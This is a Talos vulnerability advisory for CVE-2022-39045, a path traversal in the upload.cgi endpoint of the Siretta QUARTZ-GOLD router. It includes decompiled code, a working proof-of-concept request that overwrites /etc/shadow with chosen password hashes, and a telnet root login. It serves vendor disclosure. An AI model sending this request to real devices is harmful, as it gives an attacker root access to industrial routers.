CVE-2022-39045: TALOS-2022-1611 || Cisco Talos Intelligence Group

SUMMARY

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

PRODUCT URLS

QUARTZ-GOLD - https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/

CVSSv3 SCORE

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint upload.cgi permits to upload a file. Following one of the functions responsible for this API:

void input_upload.cgi(char *path,int len,char *boundary)

{
  [...]   
  remaining_length_to_write = len;
  storage_udisk = nvram_get_int("storage_udisk");
  [... calculate base_folder and perform basic checks...]
  else {
    [...]
    filename_param = (char *)webcgi_safeget("filename");                                                        [1]
    filename = "";
    if (filename_param != (char *)0x0) {
      filename = filename_param;
    }
    sprintf(buff,"%s/%s",base_folder,filename);                                                                 [2]
    fd = fopen(buff,"w");                                                                                       [3]
    if (fd == (FILE *)0x0) {
      base_folder = "Unable to start pipe for mtd write";
    }
    else {
      [...]
      boundary_len = strlen(boundary);
      remaining_length_to_write = (remaining_length_to_write - 6) - boundary_len;
      while (0 < (int)remaining_length_to_write) {
        n_bytes_to_read = remaining_length_to_write;
        [...]
        n_bytes_read = web_read(buff,n_bytes_to_read);
        [...]
        remaining_length_to_write = remaining_length_to_write - n_bytes_read;
        bytes_written = safe_fwrite(buff,1,n_bytes_read,fd);                                                    [4]
        [...]
}

This function will fetch the specified filename, at [1], and then it will use it to compose the file-path at [2]. The compose file-path is used at [3] to create/overwrite the file, and then the uploaded file will be used for the content of the just-created/overwritten file at [4]. Because from [1] up to [2] no sanitization is performed against the filename parameter, this function is vulnerable to a path traversal vulnerability. This can lead to overwriting an arbitrary file in the file-system and can lead to arbitrary command execution.

Exploit Proof of Concept

Sending a request like the following:

POST /upload.cgi?_http_id=<the correct tid>&filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic <a valid basic auth value>
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884

--906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name="content"; filename="content"

root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
--906881afb7fae201f7f9962a229f9884--

If the request was successful, it is now possible to access the device using root:admin as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

❯ telnet 192.168.0.1 2323
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
QUARTZ-GOLD login: root
Password: 

root@QUARTZ-GOLD:/tmp/home/root#

Effectively allowing arbitrary command execution.

TIMELINE

2022-10-14 - Initial Vendor Contact

2022-10-20 - Vendor Disclosure

2022-11-24 - Vendor Patch Release

2023-01-26 - Public Release

Discovered by Francesco Benvenuto of Cisco Talos.